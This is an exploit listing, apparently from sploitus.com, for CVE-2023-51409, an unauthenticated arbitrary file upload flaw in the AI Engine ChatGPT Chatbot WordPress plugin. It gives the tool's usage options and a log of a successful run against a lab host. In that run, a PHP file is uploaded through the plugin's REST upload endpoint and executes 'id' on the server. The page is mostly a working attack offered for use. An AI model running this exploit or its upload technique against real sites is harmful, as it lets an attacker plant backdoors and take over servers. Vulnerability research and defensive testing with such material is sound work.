## https://sploitus.com/exploit?id=CFBC579A-A513-5709-8941-8035D7EDBD3F
# CVE-2023-51409
#### AI Engine: ChatGPT Chatbot <= 1.9.98 - Unauthenticated Arbitrary File Upload via rest_upload
## Description
This could allow a malicious actor to upload any type of file to your website. This can include backdoors which are then executed to gain further access to your website.
## usage:
```
options:
-h, --help show this help message and exit
-u URL, --url URL Base URL of the WordPress instance.
-code PHP_CODE, --php_code PHP_CODE
PHP code to upload (default, id).
```
### The result
```
[INFO] Initiating version check for target.
[INFO] Target plugin version detected: 1.9.98
[VULNERABLE] Detected vulnerable plugin version. Proceeding with exploitation.
[INFO] Target is vulnerable. Proceeding with file upload.
[INFO] Attempting to upload file: Nxploit.php to endpoint: http://192.168.100.74:888/wordpress/wp-json/mwai-ui/v1/files/upload
[SUCCESS] File uploaded successfully! Accessible at: http://192.168.100.74:888/wordpress/wp-content/uploads/2025/01/Nxploit.php
[INFO] Exploitation complete. Uploaded file URL: http://192.168.100.74:888/wordpress/wp-content/uploads/2025/01/Nxploit.php
```
### default php code
```
id
uid=1(daemon) gid=1(daemon) groups=1(daemon)
```